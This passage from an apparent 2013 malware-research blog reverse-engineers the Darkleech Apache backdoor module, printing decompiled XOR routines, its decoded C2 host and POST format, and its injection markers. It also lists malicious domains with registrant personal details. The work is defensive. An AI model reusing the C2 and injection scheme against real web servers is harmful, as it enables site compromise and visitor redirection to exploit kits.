   (contains IP addresses)
C_ARRAY_BLACKLIST_URI
     "ADMIN"
C_ARRAY_SUDOERS
   (contains list of user with sudoers right)
C_ARRAY_BAN_PROC
   (contains MD5 of banned process)
   i.e.:
   f7277f6714e4b034216cf6558cc6327b
   28878074a3dd19c7361e8a6d3f04fc17
   d0415afe195478d4d8c9af205644
4. Malware checked conditions:

_CHECK_BLACKLIST           0x3D20  
_CHECK_BOT_USERAGENT       0x3650  
_CHECK_JS                  0x3180  
_CHECK_LOCAL_IP            0x44F0  
_CHECK_PROC                0x3980  
_CHECK_RAW_COOKIE          0x3190  
_CHECK_REFERER_IS_HOST     0x31C0  
_CHECK_REFERER_IS_SEO      0x3540  
_CHECK_SITE_ADMIN          0x3860  
_CHECK_SITE_KERNEL         0x31B0  
_CHECK_UTMP                0x3BB0  
_CHECK_WAITLIST            0x5500  
5. The Blacklist files

/var/tmp/sess_

6. Usage of cookies to control infection

7. Finally, the post-check, code injection
Injection methods:
INJECT
javascript
text/js
Injection Code Boundaries 
C_MARKER_LEFT: {{{
C_MARKER_RIGHT: }}}
Inject commands: 
_INJECT_DO
_INJECT_LOAD
_INJECT_SAVE
_INJECT_SKIP
_INJECT_UPDATE
Reversing Darkleech Malware Module

Below is the reversing steps of the recent modules spotted between March 17th to March 22nd, 2013 in hundreds of infected sites we cleaned up. We used two permitted samples to be uploaded into virus total as per below details:

Sample 1 URL --> here
SHA256: 94ef407cc485989464dcf390fcea6e82218bc89f75394e41a95e0bb31830786b
SHA1: cc594b4d924b0710db64bcca5012d22db8842f98
MD5: 81c1d493c7764f6692c30de8923c76ba
File size: 36.4 KB ( 37296 bytes )
File name: mod_sec2_config.so
File type: ELF
Tags: elf
Detection ratio: 4 / 45
Analysis date: 2013-03-20 02:42:20 UTC ( 5 minutes ago )
【ExifTool】
MIMEType.................: application/octet-stream
CPUByteOrder.............: Little endian
CPUArchitecture..........: 32 bit
FileType.................: ELF executable
ObjectFileType...........: Shared object file
CPUType..................: i386
【Malware Name】
GData                    : ELF:Apmod-B
Avast                    : ELF:Apmod-B [Trj]
Microsoft                : Backdoor:Linux/Apmod.gen!A
Kaspersky                : HEUR:Backdoor.Linux.Apmod.gen
Sample 2 URL --> here
SHA256: ece16200fd54500a33d81f37a9f864148cbf8846514978413168ffacd46d28c3
SHA1: ef3741f3cc2c60cc4cd88e6293776e39d56cd78b
MD5: ae7c369b8bd49a04f87fab72d4d3431d
File size: 36.4 KB ( 37272 bytes )
File name: mod_pool_log.so
File type: ELF
Tags: elf
Detection ratio: 5 / 45
Analysis date: 2013-03-20 02:42:45 UTC ( 9 minutes ago )
【ExifTool】
MIMEType.................: application/octet-stream
CPUByteOrder.............: Little endian
CPUArchitecture..........: 32 bit
FileType.................: ELF executable
ObjectFileType...........: Shared object file
CPUType..................: i386
【Malware Name】
GData                    : ELF:Apmod-B
Avast                    : ELF:Apmod-B [Trj]
Microsoft                : Backdoor:Linux/Apmod.gen!A
Kaspersky                : HEUR:Backdoor.Linux.Apmod.gen
Ikarus                   : Backdoor.Linux.Apmod
File Information (the first file only) 
$ ls -alF ./mod_sec2_config.so
-rwxr--r--  1 xxx xxx  37296 Jun 26  2007 ./mod_sec2_config.so*

// md5..

$ md5 mod_sec2_config.so
MD5 (mod_sec2_config.so) = 81c1d493c7764f6692c30de8923c76ba

// file info

file format elf32-i386
architecture: i386, flags 0x00000150:
HAS_SYMS, DYNAMIC, D_PAGED
start address 0x00003050

0000   7F 45 4C 46 01 01 01 00 00 00 00 00 00 00 00 00    .ELF............
0010   03 00 03 00 01 00 00 00 50 30 00 00 34 00 00 00    ........P0..4...
0020   A0 8D 00 00 00 00 00 00 34 00 20 00 05 00 28 00    ........4. ...(.
0030   1A 00 19 00 01 00 00 00 00 00 00 00 00 00 00 00    ................
0040   00 00 00 00 F0 77 00 00 F0 77 00 00 05 00 00 00    .....w...w......
0050   00 10 00 00 01 00 00 00 00 80 00 00 00 80 00 00    ................
0060   00 80 00 00 F0 0B 00 00 84 0D 00 00 06 00 00 00    ................
0070   00 10 00 00 02 00 00 00 18 80 00 00 18 80 00 00    ................
0080   18 80 00 00 D0 00 00 00 D0 00 00 00 06 00 00 00    ................
0090   04 00 00 00 50 E5 74 64 C0 70 00 00 C0 70 00 00    ....P.td.p...p..
00A0   C0 70 00 00 7C 01 00 00 7C 01 00 00 04 00 00 00    .p..|...|.......
00B0   04 00 00 00 51 E5 74 64 00 00 00 00 00 00 00 00    ....Q.td........
  :
For unixmen, fire your objdump to gain these values: 
Program Header:
    LOAD off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**12
         filesz 0x000077f0 memsz 0x000077f0 flags r-x
    LOAD off    0x00008000 vaddr 0x00008000 paddr 0x00008000 align 2**12
         filesz 0x00000bf0 memsz 0x00000d84 flags rw-
 DYNAMIC off    0x00008018 vaddr 0x00008018 paddr 0x00008018 align 2**2
         filesz 0x000000d0 memsz 0x000000d0 flags rw-
EH_FRAME off    0x000070c0 vaddr 0x000070c0 paddr 0x000070c0 align 2**2
         filesz 0x0000017c memsz 0x0000017c flags r--
   STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2
         filesz 0x00000000 memsz 0x00000000 flags rw-

Dynamic Section:
  NEEDED      libm.so.6
  NEEDED      libc.so.6
  SONAME      mod_sec2_config.so
  INIT        0x29f8
  FINI        0x6f74
  HASH        0xd4
  STRTAB      0x16ec
  SYMTAB      0x7bc
  STRSZ       0x964
  SYMENT      0x10
  PLTGOT      0x82cc
  PLTRELSZ    0x318
  PLTREL      0x11
  JMPREL      0x26e0
  REL         0x22c8
  RELSZ       0x418
  RELENT      0x8
  VERNEED     0x2238
  VERNEEDNUM  0x2
  VERSYM      0x2050
  RELCOUNT    0x9

Version References:
  required from libm.so.6:
    0x0d696910 0x00 08 GLIBC_2.0
  required from libc.so.6:
    0x09691f73 0x00 07 GLIBC_2.1.3
    0x0d696911 0x00 06 GLIBC_2.1
    0x0d696914 0x00 05 GLIBC_2.4
    0x09691974 0x00 04 GLIBC_2.3.4
    0x0d696913 0x00 03 GLIBC_2.3
    0x0d696910 0x00 02 GLIBC_2.0

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .hash         000006e8  000000d4  000000d4  000000d4  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .dynsym       00000f30  000007bc  000007bc  000007bc  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .dynstr       00000964  000016ec  000016ec  000016ec  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .gnu.version  000001e6  00002050  00002050  00002050  2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .gnu.version_r 00000090  00002238  00002238  00002238  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .rel.dyn      00000418  000022c8  000022c8  000022c8  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .rel.plt      00000318  000026e0  000026e0  000026e0  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .init         00000017  000029f8  000029f8  000029f8  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  8 .plt          00000640  00002a10  00002a10  00002a10  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  9 .text         00003f24  00003050  00003050  00003050  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 10 .fini         0000001c  00006f74  00006f74  00006f74  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .rodata       0000011d  00006fa0  00006fa0  00006fa0  2**5
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 12 .eh_frame_hdr 0000017c  000070c0  000070c0  000070c0  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 13 .eh_frame     000005b4  0000723c  0000723c  0000723c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .ctors        00000008  00008000  00008000  00008000  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 15 .dtors        00000008  00008008  00008008  00008008  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .jcr          00000004  00008010  00008010  00008010  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .data.rel.ro  00000004  00008014  00008014  00008014  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000d0  00008018  00008018  00008018  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          000001e4  000080e8  000080e8  000080e8  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      00000198  000082cc  000082cc  000082cc  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         00000770  00008480  00008480  00008480  2**5
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000184  00008c00  00008c00  00008bf0  2**5
                  ALLOC
 23 .comment      000000e4  00000000  00000000  00008bf0  2**0
                  CONTENTS, READONLY
Full strings used: 
0x16ED   0x16ED   __gmon_start__
0x16FC   0x16FC   _init
0x1702   0x1702   _fini
0x1708   0x1708   __cxa_finalize
0x1717   0x1717   _Jv_RegisterClasses
0x172B   0x172B   to_hex
0x173A   0x173A   _CHECK_JS
0x1744   0x1744   _CHECK_RAW_COOKIE
0x1756   0x1756   KEY_CLIENT
0x1761   0x1761   _CHECK_SITE_KERNEL
0x1774   0x1774   _CHECK_REFERER_IS_HOST
  :        :        
0x8BF1   0x8BF1   GCC: (GNU) 4.1.1 20060525 (Red Hat 4.1.1-1)
0x8C1E   0x8C1E   GCC: (GNU) 4.1.1 20070105 (Red Hat 4.1.1-51)
0x8C4C   0x8C4C   GCC: (GNU) 4.1.1 20070105 (Red Hat 4.1.1-51)
0x8C7A   0x8C7A   GCC: (GNU) 4.1.1 20070105 (Red Hat 4.1.1-51)
0x8CA8   0x8CA8   GCC: (GNU) 4.1.1 20060525 (Red Hat 4.1.1-1)
  :         :
0x8D55   0x8D55   .ctors
0x8D5C   0x8D5C   .dtors
0x8D68   0x8D68   .data.rel.ro
0x8D75   0x8D75   .dynamic
0x8D83   0x8D83   .got.plt
0x8D8C   0x8D8C   .data
0x8D97   0x8D97   .comment
Here's the full list--> hereSeparating import modules & symbols values: Imported modules: 
$ rabin2 -i ./mod_sec2_config.so | cut -d" " -f7 | cut -c6- | sort
[Imports]

67 imports
_Jv_RegisterClasses
__ctype_b_loc
__ctype_tolower_loc
__ctype_toupper_loc
__cxa_finalize
__fprintf_chk
__gmon_start__
__memcpy_chk
     :
Symbols... 
$ rabin2 -s ./mod_sec2_config.so | cut -d" " -f8 | cut -c6- | sort
[Symbols]

163 symbols
ARRAY_BAN_LOCAL_IP
ARRAY_BAN_PROC
ARRAY_BAN_USERAGENT
ARRAY_BLACKLIST_URI
ARRAY_SE_REFERER
ARRAY_SUDOERS
  :
Full list of imported modules & symbols--> here We'll the XOR endoded strings like:  At the last part of reversed symbols we found XOR functions: 
0x17C8   0x17C8   xor_decrypt_string
0x17ED   0x17ED   xor_encrypt_string
0x1800   0x1800   xor_encrypt
I reversed them to confirm XOR method: 
xor_encrypt(A8, Ac, A10, A14)
/* unknown */ void  A8;
/* unknown */ void  Ac;
/* unknown */ void  A10;
/* unknown */ void  A14;
{
 /* unknown */ void  ebx;
 /* unknown */ void  esi;
 /* unknown */ void  Vfffffff4;

    edx = A10;
    L00003117();
    ebx = ebx + 0x4f3b;
    if(edx != 0 && A8 != 0) {
        Vfffffff4 = A14;
        *esp = *( *( *( *(ebx + -300)) + 0xc));
        *(ebp - 0x10) = L00002D90();
        if(A14 > 0) {
            ecx = 0;
            do {
                edx = ecx;
                eax = ecx;
                edx = edx >> 0x1f;
                Ac = Ac / Ac;
                eax = *(ecx + A10) & 0xff;
                al = al ^ *(Ac % Ac + A8);
                *(ecx + *(ebp - 0x10)) = al;
                ecx = ecx + 1;
            } while(ecx != A14);
        }
        return *(ebp - 0x10);
    }
    *(ebp - 0x10) = 0;
    eax = *(ebp - 0x10);
    esp = esp + 0xc;}

xor_encrypt_string(A8, Ac, A10, A14)
/* unknown */ void  A8;
/* unknown */ void  Ac;
/* unknown */ void  A10;
/* unknown */ void  A14;
{
 /* unknown */ void  V0;
 /* unknown */ void  V4;
 /* unknown */ void  ebx;
 /* unknown */ void  Vfffffffc;

    ebx = ebx + 0x4f7d;
    V4 = L00003117();
    V0 = A10;
    Vfffffffc = Ac;
    *esp = A8;
    return L00002C00();}

xor_decrypt_string(A8, Ac, A10, A14)
/* unknown */ void  A8;
/* unknown */ void  Ac;
/* unknown */ void  A10;
/* unknown */ void  A14;
{
 /* unknown */ void  ebx;
 /* unknown */ void  esi;
 /* unknown */ void  Vfffffff4;

    L00003117();
    ebx = ebx + 0x5001;
    esp = esp - 0xc;
    Vfffffff4 = A14 + 1;
    *esp = *( *( *( *(ebx + -300)) + 0xc));
    *(ebp - 0x10) = L00002D90();
    if(A14 > 0) {
        ecx = 0;
        do {
            edx = 0;
            eax = 0;
            edx = 0 >> 0x1f;
            Ac = Ac / Ac;
            al = *A10 & 0xff ^ *(Ac % Ac + A8);
            *( *(ebp - 0x10)) = al;
        } while(1 != A14);
    }
    esi = *(ebp - 0x10);
    *(esi + A14) = 0;
    eax = esi;
    esp = esp + 0xc;}
So it looks decode and encode the XOR'ed strings. Question: what strings? It is actually contains malware hidden data: 
C_MODULE_VERSION: 
C_CC_HOST: 
C_CC_URI: 
C_CC_REQUEST_FORMAT: 
C_MARKER_LEFT: 
C_MARKER_RIGHT:
C_TMP_DIR: 
C_LIST_PREF: 
C_COOKIE_NAME: 
C_ARRAY_TAGS_FOR_INJECT:
C_ARRAY_BAN_USERAGENT: 
C_ARRAY_BLACKLIST_URI:
C_ARRAY_SE_REFERRER: 
C_ARRAY_SUDOERS: 
C_ARRAY_BAN_PROC: 
C_ARRAY_BAN_LOCAL_IP:
C_STRING_1: 
C_STRING_2: 
C_STRING_3: 
   :
C_STRING_35:
C_STRING_36:
We need to find size & offset per variable, i.e.: 
{'name':'C_MODULE_VERSION',       'size':10, 'offset':0x8491},
{'name':'C_CC_HOST',              'size':12, 'offset':0x849b},
{'name':'C_CC_URI',               'size':15, 'offset':0x84a7},
{'name':'C_CC_REQUEST_FORMAT',    'size':96, 'offset':0x84c0},
{'name':'C_MARKER_LEFT',          'size':3,  'offset':0x8520},
{'name':'C_MARKER_RIGHT',         'size':3,  'offset':0x8523},
{'name':'C_TMP_DIR',              'size':8,  'offset':0x8526},
{'name':'C_LIST_PREF',            'size':5,  'offset':0x852e},
{'name':'C_COOKIE_NAME',          'size':15, 'offset':0x8533},
{'name':'C_ARRAY_TAGS_FOR_INJECT','size':77, 'offset':0x8560},
{'name':'C_ARRAY_BAN_USERAGENT',  'size':622,'offset':0x85c0},
{'name':'C_ARRAY_BLACKLIST_URI',  'size':5,  'offset':0x882e},
{'name':'C_ARRAY_SE_REFERRER',    'size':281,'offset':0x8840},
{'name':'C_ARRAY_SUDOERS',        'size':1,  'offset':0x8959},
{'name':'C_ARRAY_BAN_PROC',       'size':94, 'offset':0x8960},
{'name':'C_ARRAY_BAN_LOCAL_IP',   'size':48, 'offset':0x89e0},
{'name':'C_STRING_1',             'size':12, 'offset':0x8a10},
{'name':'C_STRING_2',             'size':9,  'offset':0x8a1c},
{'name':'C_STRING_3',             'size':1,  'offset':0x8a25},
    :         :                      :
{'name':'C_STRING_33',            'size':20, 'offset':0x8b3e},
{'name':'C_STRING_34',            'size':1,  'offset':0x8b52},
{'name':'C_STRING_35',            'size':3,  'offset':0x8b5a}
And figured the XOR offset & size, i.e. at the second sample: 
0x0000847a (02) 0000                   ADD [EAX], AL
0x0000847c (02) 0000                   ADD [EAX], AL
0x0000847e (02) 0000                   ADD [EAX], AL
0x00008480 (06) dc9ba14f377b           FCOMP QWORD [EBX+0x7b374fa1] // <==
0x00008486 (01) 40                     INC EAX
0x00008487 (04) c114ca42               RCL DWORD [EDX+ECX*8], 0x42
0x0000848b (02) ff08                   DEC DWORD [EAX]
0x0000848d (01) 16                     PUSH SS
0x0000848e (01) 95                     XCHG EBP, EAX
0x0000848f (05) 3544eeab90             XOR EAX, 0x90abee44
0x00008494 (02) 7d19                   JGE 0x000084af   ; 1
Then put the offset & size in the Julien's script: 

// first sample:
fd.seek(0x8480)
key = fd.read(17)

//second sample:
fd.seek(0x84a0)
key = fd.read(23)
And we got the XOR decoded output values like: 
$ python sec2.py "./mod_sec2_config.so"
C_MODULE_VERSION: "2012.12.14"
C_CC_HOST: "217.23.13.6"
C_CC_URI: "/Home/index.php"
C_CC_REQUEST_FORMAT: "POST %s HTTP/1.1"
Host: "%s"
Content-Type: "application/x-www-form-urlencoded"
Content-Length:"
    %i
    %s"
C_MARKER_LEFT: "{{{"
C_MARKER_RIGHT: "}}}"
C_TMP_DIR: "/"
C_LIST_PREF: "sess_"
C_COOKIE_NAME: "PHP_SESSION_ID="
C_ARRAY_TAGS_FOR_INJECT: "
＜/script＞
＜/style＞
＜/head＞
＜/title＞
＜/body＞
＜/html＞
＜/table＞
＜/h1＞
＜/i＞
＜/ul＞"
     :
or 
$ python sec3.py "./mod_pool_log.so"
C_MODULE_VERSION: "2012.12.14"
C_CC_HOST: "217.23.13.65"
C_CC_URI: "/Home/index.php"
C_CC_REQUEST_FORMAT: "POST %s HTTP/1.1"
Host: "%s"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: 
  "%i"
  "%s"
C_MARKER_LEFT: "{{{"
C_MARKER_RIGHT: "}}}"
C_TMP_DIR: "/var/tmp"
C_LIST_PREF: "sess_"
C_COOKIE_NAME: "PHP_SESSION_ID="
   :
You'll see the injection method used: 
C_STRING_2: text/html
C_STRING_3: %
C_STRING_5: document.write('%s');
C_STRING_5: r
C_STRING_6: User-Agent
C_STRING_7: %s%.*s
C_STRING_8: Referer
C_STRING_9: X-Forwarded-For
C_STRING_10: Client-IP
C_STRING_11: X-Real-IP
C_STRING_12: Cookie
C_STRING_13: ;
C_STRING_14: %s/%s%s
C_STRING_15: INJECT
C_STRING_16: javascript
C_STRING_17: text/js
C_STRING_18: j
Injected code is saved in %s as as per PoC'ed in traffic PCAP: These are ment to inject redirection code after tags: 
C_ARRAY_TAGS_FOR_INJECT: 
＜/script＞
＜/style＞
＜/head＞
＜/title＞
＜/body＞
＜/html＞
＜/table＞
＜/h1＞
＜/i＞
＜/ul＞
Like the below code (usage after tag): The ID, Cookies and Hashes used: 
C_COOKIE_NAME: PHP_SESSION_ID=
C_STRING_20: id=
C_STRING_21: %a %d-%b-%Y %H:%M:%S %Z
C_STRING_22: Set-Cookie
C_STRING_23: %s%i; expires=%s; path=/
C_STRING_24: Set-Cookie
C_STRING_25: w
C_STRING_26: %
C_STRING_27: Request-Hash
Contacting mother ships with method: 
C_CC_HOST: 217.23.13.65
C_CC_URI: /Home/index.php
C_CC_REQUEST_FORMAT: POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %i
Infection method & traces

One should not try to seek traces on infection in /var/log/messages, is useless since the related logs were deleted. But I advise to go straight to see the traces in the Apache modules directories to grep the rogue module filenames with the above described regex, or see the TMP or TEMP environment for the "sess_" malware's blacklist / saved files. Yes, root was accessed and server were in severe compromised state.

Attack source IP

These are redirected IPs & source of preliminary attack:
65.75.139.229
129.121.99.242
129.121.176.15
149.47.146.13
149.47.146.139
173.192.50.193
  :
These USA networks were used: 
65.75.190.0/18,19,20,24 https://twitter.com/MalwareMustDie/status/313007473546117120
69.50.224.0/19 https://twitter.com/MalwareMustDie/status/313002510199693312
69.89.0.0/20 https://twitter.com/MalwareMustDie/status/312999183130968064
129.121.0.0/16, https://twitter.com/MalwareMustDie/status/312995306113466368
149.47.0.0/16 https://twitter.com/MalwareMustDie/status/312991655429033985 
And latest attack source detected was moved to Netherland: 
217.23.13.65
Additional
The malware is not 100% working in some infected systems. In some systems it crashes with signal 11: 
execve("./mod_sec2_config.so",
["./mod_sec2_config.so"],
[/* 21 vars */]) = 0
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++
Blocking below libs from unknown usage willl help: 
/usr/lib/libbdl.so.0
/usr/lib/libm.so.6
/usr/lib/libc.so.6
Blocking unknown user access to this path will help: 
/proc
/proc/%s/comm
/var/run/utmp
GLIBC version used to run malware module (to block): 
    0x09691f73 0x00 07 GLIBC_2.1.3
    0x0d696911 0x00 06 GLIBC_2.1
    0x0d696914 0x00 05 GLIBC_2.4
    0x09691974 0x00 04 GLIBC_2.3.4
    0x0d696913 0x00 03 GLIBC_2.3
    0x0d696910 0x00 02 GLIBC_2.0
Encoding used: 
base64decode
base64encode
to_hex
urlencode
xor_decrypt_string
xor_encrypt
xor_encrypt_string
Reversing Notes: Disassembly of malware functions is--> here. Complete disassembly of malware module is--> here.  
Samples
For raising the AV's detection ratio and research, we are sharing the samples --> here.  
Credits
Thank you to the wonderful individuals who help us in  detection, analysis, cooperation for current threat handling: Charlie Hurrel - without him infection will be wide-spread. Julien Voisin  - without him I will stuck with reversing the XOR Denis Laskov   - good analysis for cookie scheme for infection Jim Kesselring - the MMD "Razor" to shut all US based infection Eric Romang    - your related report helped a lot, you know that? :-) David Harley   - for the clarification of Linux/Chapro facts Unmask Parasites blogger - who wrote good report of this threat! To all MalwareMustDie members & supporters involved in  this investigation,  This post is dedicated to sleepless hundreds admins  who did great job in removing malwares, reinstalling  and re-tuning their website due to this incident.

The current suspension is the work under good coordination between security researchers who spotted the threat, our PiC in charge (thank's to ‏@essachin) and the related registrant who help to the suspension and banning procedure process accordingly. We received the great lead time in following this suspention as a good sign to shutdown more malware domains in the future.

Here we go:

1. Suspension of 22 domains of Sweet Orange EK malware infector
   OP Name: #OperationOrangeTart
   Thank you for the cooperation of the related registrar!

The evidence/analysis related to the threat:

Sweet Orange EK infection analysis-->here

Verdict:
[1] URLQuery -->here
[2] URLQuery -->here
[3] URLQuery -->here

Suspended domains:
widgetcolorq1.biz
widgetcolorq2.biz
widgetcolorq3.biz
widgetcolorq4.biz
widgetcolorq5.biz
widgetcolorq6.biz
widgetcolorq7.biz
widgetcolorq8.biz
widgetcolorq9.biz
widgetcolorq10.biz
familyteapie1.biz
familyteapie2.biz
familyteapie3.biz
familyteapie4.biz
familyteapie5.biz
familyteapie6.biz
familyteapie7.biz
familyteapie8.biz
familyteapie9.biz
familyteapie10.biz
bignigthbrotherinc.biz
visiowrongly.biz
The registrant involved lead to the bad actor involved: 
Registrant ID:             DI_27001099
Registrant Name:           Lukas Vilkos
Registrant Organization:   N/A
Registrant Address1:       Independence str 12, 22
Registrant City:           Nederka
Registrant State/Province: Flevoland
Registrant Postal Code:    3313
Registrant Country:        Netherlands
Registrant Country Code:   NL
Registrant Phone Number:   +31.33131451
Registrant Email:          jokey00012@googlemail.com
*)is currently under the BAN list.  Related information:  
#MalwareMustDie - @unixfreaxjp Just detected the first Sweet Orange EK infection in Japan twitter.com/unixfreaxjp/st…twitter.com/MalwareMustDie…
— Malware Crusaders (@MalwareMustDie) March 25, 2013
【マルウェア感染警告】 #OCJP-100： 旧慶風高等学校のホームページ「www(.)eonet.ne(.)jp / 218.251.89.6」にSweetOrangeEKのマルウェア感染コードを発見しました unixfreaxjp.blogspot.jp/2013/03/ocjp-1…#CleanUpPLS
— Hendrik ADRIAN (@unixfreaxjp) March 25, 2013
@essachin @malwaremustdie still down!!! #MalwareMustDie!!! twitter.com/alfr3d0x/statu…
— Don Alfredo (@alfr3d0x) March 25, 2013
2. Suspension of 240+ domains of Sofos EK malware infector    OP Name: #OperationBurnAffectsuites    Thank you for good cooperation from related registrar!  The evidence/analysis related to the threat: Verdict:  [1] URLQuery -->here[2] URLQuery -->here[3] URLQuery -->here[4] Good infection chain picture by @HkMalwares *) click to enlarge↑ [5] Infection in progress (landing page) PCAP -->here[6] Jsunpack evidence of landing page -->here[7] Landing page decoded -->here To be banned. The bad actor's registrant data: 
Registrant ID:            DI_26439309
Registrant Name:          steal elaine
Registrant Organization:  N/A
Registrant Address1:      attributable 90
Registrant City:          LosAngeles
Registrant Postal Code:   450963
Registrant Country:       United States
Registrant Country Code:  US
Registrant Phone Number:  +466.5415358
Registrant Email:         affectsuites@projectedtornadossmoked.com
*) More Malicious Domains under this registrant-->here We issued suspension of current case related domains,  which is currently effectibe in DNS query and  the full suspension will be effective shortly. 
maximize-avwodawdletokp.biz
underneathbc.biz
openercvmb.biz
siftingvzu.biz
trulylktarraignedwto.biz
draughtek.biz
oopovstwhoopsqi.biz
xhdahqobextractionqck.biz
referenceslni.biz
commandmentsbqzsnoopyle.biz
bored-sbdmanipulateykq.biz
intellectualqwe.biz
merrilyeolfsqueakruv.biz
becomesxy.biz
buryingkurz.biz
czrlstwithdrewgnc.biz
unleashednssc.biz
dcryfvhardenvgd.biz
vehementlybtpromulgateptz.biz
characterizesmrdf.biz
dalxunspoiledqmtu.biz
ibnxbdownsizingfsw.biz
eyed-mugbsurvivabilityfak.biz
suspensionsnlyotwinsnx.biz
plausibility-hastretchingab.biz
promptsyy.biz
ufo-soqgenitaliaxr.biz
orphanednkzt.biz
particulatezdn.biz
capitalisticmze.biz
tywma-lvusedsx.biz
facilityzw.biz
avuwu-edcrowdsboa.biz
vhprc-veunderestimatedzft.biz
praising-fcsparcelkimz.biz
underpaidksl.biz
somedaysniffammunition.biz
inimationsexy.org
jerseyutterancepublications.biz
conferencingnym.biz
ygqxuvashtraysttew.biz
potholeskzbrentcrr.biz
cripplepko.biz
knotsztwq.biz
consciencesbxdhawaiianazp.biz
earmarksygv.biz
ryxxlxtogetheriddz.biz
evolvebhls.biz
udkqepknifeoyqr.biz
detectingszx.biz
dauntingoqfchampaignimmb.biz
wlczvahaulsr.biz
unnoticedlbi.biz
settings-ffuxreplicationkqo.biz
kingstonbg.biz
as-lwirenegademzn.biz
quartersozfi.biz
mailings-nioctoberocu.biz
brands-recommercialsps.biz
communicatingcly.biz
stripedrxhg.biz
positivelyxc.biz
reversingtk.biz
censoredxf.biz
fixturesdo.biz
sownnks.biz
rdkyazdiskettesgazq.biz
singaporeaeicuttersie.biz
julietouz.biz
incitementmsdenominatorbw.biz
addictionsr.biz
lldatyxsurferssz.biz
curiositieszk.biz
leapsizn.biz
kangaroostsol.biz
generickkfn.biz
legitzzcomsqc.biz
tvgolgogwholesalerta.biz
compliantbfapacificannao.biz
ndvsyhvsmoralfrl.biz
qtzpdfoursquarelgen.biz
medicationsoetlexpediencewf.biz
capitalizedvty.biz
remindersoevi.biz
cakenkq.biz
mayorch.biz
golferztphoneoux.biz
reproduceolbp.biz
ypdwqrizfederallyedm.biz
executioners-qqsimpleupt.biz
iybet-hrthrottleuv.biz
crustedosaq.biz
landscapingdukddisclaimqxmq.biz
hynaylabyrinthqvi.biz
gavefqmt.biz
closurecw.biz
limexktombszy.biz
dothku.biz
pinkypxznaturalizationgxe.biz
settlementdp.biz
cartridgeshyic.biz
approximationszxdguessingzqvl.biz
bankersnhrl.biz
invokedhd.biz
broad-bpexpeditionodvn.biz
doableevcv.biz
vanessaevr.biz
transparent-nvmaturitybzw.biz
lydytmlbeardssr.biz
deceptionxv.biz
osbktfbuenvironmentalistdk.biz
epsiloncihz.biz
xonnzyencompassedtuak.biz
prohibitionbfm.biz
fascinatedwym.biz
udefhursttwa.biz
boilsdcx.biz
mouthfulxnr.info
fieldsurh.biz
yrhkyodefencexs.biz
pmvoerecantlxsd.biz
corridor-rhyuckypho.biz
carnagekbz.biz
uncoveredoq.biz
junketxme.biz
levyrwl.biz
trickmdv.biz
malawigt.biz
smatteringon.biz
testinimationsexy.com
consngls.biz
convictionsxns.biz
arabicfng.biz
gripping-ozhmeatshm.biz
embarkify.biz
vnszthrdigitalztis.biz
transforming-bdadamsxay.biz
redeemsxky.biz
bzzccupriceduiy.biz
tractionmcabandonedqnxv.biz
scqa-xepxalbeitxtxh.biz
intimacycn.biz
warfareoyfreplaceabledlc.biz
gyeffsincerelyqi.biz
downwardfq.biz
uviiqnbimpromptuouv.biz
millionstpnh.biz
robbertptr.biz
principalsleus.biz
eqbxgnyncwratheol.biz
cosmosps.biz
swxprecountrr.biz
stuffingyvvmysteriousne.biz
dynamitesnxbbondagexvm.biz
volitionep.biz
overloadfhtm.biz
bellynx.biz
larrymvx.biz
zvz-ssxtriedpnu.biz
confinementsxvw.biz
xttwkdtextortionrsbe.biz
ytaqetsupperhg.biz
arroyoin.biz
ruqflkdbreakerdz.biz
scratchgxmartinmh.biz
conditioned-fpfeempowerkykt.biz
reusefbw.biz
equivalentdz.biz
freezesgp.biz
fridgenet.biz
tutoringkp.biz
powerhousespqflickercgux.biz
matt-hxowninggqq.biz
massagingrin.biz
dfihlfairskvl.biz
expectationikel.biz
kbdhqconceptionsxk.biz
judyqul.biz
dbaiedisputeqhhy.biz
notablesmoyscholarshipuw.biz
scenariosvpwp.biz
closenesszvclinchws.biz
nnuchwbunknownsqdak.biz
allowingynu.biz
clamqxor.biz
probableoko.biz
signalinggyo.biz
trimesternxnwconnersixs.biz
disinformationsm.biz
receipts-lzkmbylawsmyva.info
lament-uausendingwhx.biz
iru-bfvprincehr.biz
gqwy-dkvisualsklw.biz
ennuiuw.biz
microwavelmpg.biz
canardbapublishersihm.biz
copedxibc.biz
kswdt-ytzkjuntaaiq.biz
characterizationczcreactsxfb.biz
factoringpdoxidesldt.biz
pharmaceuticalyegn.biz
privatelyucr.biz
sdwepcugcottotq.biz
vpya-gbudgiftqw.biz
establishedhgd.biz
allegedlynsiy.biz
rodentlbwmsnailswmyc.biz
theegtqiincidenceutbt.biz
limitationskqht.biz
seniorityayv.biz
krishna-qecdissentersktm.biz
identifyerg.biz
frankfurthegt.biz
definitionskocaringqp.biz
vintagefcgz.biz
retireddbuh.biz
caucasiangyfinationalsnffq.biz
